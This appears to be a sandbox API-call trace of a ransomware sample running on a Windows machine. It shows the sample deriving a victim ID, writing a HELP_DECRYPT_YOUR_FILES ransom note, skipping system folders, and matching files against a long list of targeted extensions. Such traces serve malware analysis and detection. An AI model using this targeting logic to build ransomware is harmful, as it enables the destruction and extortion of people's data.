	[0180.785] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.786] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.786] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.787] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.787] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\libraries\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.787] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.787] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.787] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.788] CloseHandle (hObject=0x380) returned 1
	[0180.788] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*" (normalized: "c:\\users\\public\\libraries\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8547c3dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0180.788] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\*.*") returned 29
	[0180.788] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.788] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Libraries\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\public\\libraries\\*.*") returned 0x1d
	[0180.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.788] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="windows") returned 0x0
	[0180.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.788] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="boot") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.789] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="system volume information") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.789] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.789] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="temp") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.789] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="program files") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.789] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.789] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.790] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="appdata") returned 0x0
	[0180.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.790] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="application data") returned 0x0
	[0180.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.790] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="winnt") returned 0x0
	[0180.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.790] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="tmp") returned 0x0
	[0180.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.790] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="cache") returned 0x0
	[0180.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.791] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.791] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="webcache") returned 0x0
	[0180.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.791] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="inetcache") returned 0x0
	[0180.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.791] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="nvidia") returned 0x0
	[0180.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.791] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="packages") returned 0x0
	[0180.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.792] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="cookies") returned 0x0
	[0180.792] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.792] StrStrW (lpFirst="c:\\users\\public\\libraries\\*.*", lpSrch="programdata") returned 0x0
	[0180.792] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0180.792] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0180.792] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8547c3dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.792] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0180.792] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.792] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8547c3dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8547c3dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8549f44f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.793] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8547c3dd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8547c3dd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8547c3dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.793] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1
	[0180.793] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0
	[0180.793] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0180.793] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0180.793] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0180.793] lstrcmpW (lpString1="Music", lpString2="..") returned 1
	[0180.794] lstrcmpW (lpString1="Music", lpString2=".") returned 1
	[0180.794] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.794] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.794] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music"
	[0180.794] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music"
	[0180.794] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\"
	[0180.794] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\"
	[0180.794] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*"
	[0180.794] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*" (normalized: "c:\\users\\public\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8536e2dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.795] lstrlenW (lpString="C:\\Users\\Public\\Music\\*.*") returned 25
	[0180.795] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.795] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Music\\*.*", cchLength=0x19 | out: lpsz="c:\\users\\public\\music\\*.*") returned 0x19
	[0180.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.795] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="windows") returned 0x0
	[0180.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.796] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="boot") returned 0x0
	[0180.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.796] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0180.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.796] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.796] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="temp") returned 0x0
	[0180.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.797] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="program files") returned 0x0
	[0180.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.797] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.797] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="appdata") returned 0x0
	[0180.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.800] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="application data") returned 0x0
	[0180.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.801] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="winnt") returned 0x0
	[0180.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.801] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="tmp") returned 0x0
	[0180.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.801] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="cache") returned 0x0
	[0180.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.801] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.802] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="webcache") returned 0x0
	[0180.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.802] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0180.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.802] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0180.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.802] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="packages") returned 0x0
	[0180.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.803] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="cookies") returned 0x0
	[0180.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.803] StrStrW (lpFirst="c:\\users\\public\\music\\*.*", lpSrch="programdata") returned 0x0
	[0180.803] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8536e2dd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.803] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.803] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.803] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.803] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\"
	[0180.804] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Music\\desktop.ini") returned="C:\\Users\\Public\\Music\\desktop.ini"
	[0180.804] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33
	[0180.804] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.804] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Music\\desktop.ini", cchLength=0x21 | out: lpsz="c:\\users\\public\\music\\desktop.ini") returned 0x21
	[0180.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.804] StrStrW (lpFirst="c:\\users\\public\\music\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.804] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\public\\music\\desktop.ini" | out: lpString1="c:\\users\\public\\music\\desktop.ini") returned="c:\\users\\public\\music\\desktop.ini"
	[0180.804] lstrlenW (lpString="c:\\users\\public\\music\\desktop.ini") returned 33
	[0180.804] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.805] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.805] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
